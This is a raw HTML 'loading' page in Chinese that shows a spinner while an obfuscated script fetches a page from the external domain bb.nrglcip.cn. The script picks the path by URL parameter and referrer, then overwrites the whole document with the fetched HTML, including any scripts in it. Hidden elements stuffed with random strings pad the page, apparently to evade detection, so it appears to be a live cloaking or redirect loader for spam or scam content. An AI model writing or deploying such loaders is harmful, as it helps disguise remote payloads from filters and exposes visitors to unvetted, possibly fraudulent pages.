<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .vg1OcHA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .vg1OcHA .HBJ5o2bM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .vg1OcHA .content {
            line-height: 50px;
            text-align: center
        }

        .vg1OcHA .img {
            width: 100%
        }

        .vg1OcHA .TtHC7Ga {
            text-align: center
        }

        .vg1OcHA .TtHC7Ga span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .vg1OcHA .TtHC7Ga span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .vg1OcHA .TtHC7Ga span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .vg1OcHA .TtHC7Ga span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .vg1OcHA .TtHC7Ga span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .vg1OcHA .TtHC7Ga span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .vg1OcHA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function mdvfygXDSPnG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EQ8dDzU = mdvfygXDSPnG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EQ8dDzU +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EQ8dDzU +".html?a=share";
		}
		
        k5ctMOY=url+"#"+new Date().getTime();
        k5ctMOY && function() {
            $.get(k5ctMOY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >kn7pexfM7NlkiP22QxAkjTinRpvUmQYyBwF</ul>
<b style='display:none' >tfUm0Ae7XBUTB64pYpwJdiyJkoCsmHDCIxJh0wruWX4I</b>
<ul style='display:none' >kn7pexfM7NlkiP22QxAkjTinRpvUmQYyBwF</ul>
<div style='display:none'>uXncpKUhqfuGmVRRZtld7ntQDq6Lhou</div>
<h1 style='display:none' >eJWq62iaYsW3GCIA94njcwG0hmbld4M7bSbq</h1>
<a  href='#' style='display:none'>chuoiZo4S8YNd1lyT8O23w8wSw0xCk1DovTuM1CPbYLzOYRjO19RwhZxAfQtMM1y3yFLZFutoC4h4B1eYq0OuZFq</a>
<b style='display:none' >tfUm0Ae7XBUTB64pYpwJdiyJkoCsmHDCIxJh0wruWX4I</b>
<a  href='#' style='display:none'>chuoiZo4S8YNd1lyT8O23w8wSw0xCk1DovTuM1CPbYLzOYRjO19RwhZxAfQtMM1y3yFLZFutoC4h4B1eYq0OuZFq</a><div class="vg1OcHA">
    <div class="HBJ5o2bM">
        <div class="TtHC7Ga">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >M2LQTNPWgxkRjfFcf8PxebdDscAPEW6YtlXdVIctNoNAgFgIb4D3oPNj8EiTa9mHUU7sByEk7mfDla8ccicTK</ul>
<a  href='#' style='display:none'>O4hRfNl0eHlDUmw511C2s3gvoE6IuXmP6Yp63G5EjdxhhYh6</a>
<span style='display:none'>roGVhEYsQFPOLxJWsPOlA9OTzqYJbz</span>
<span style='display:none'>roGVhEYsQFPOLxJWsPOlA9OTzqYJbz</span>
<ul style='display:none' >M2LQTNPWgxkRjfFcf8PxebdDscAPEW6YtlXdVIctNoNAgFgIb4D3oPNj8EiTa9mHUU7sByEk7mfDla8ccicTK</ul></body>
</html>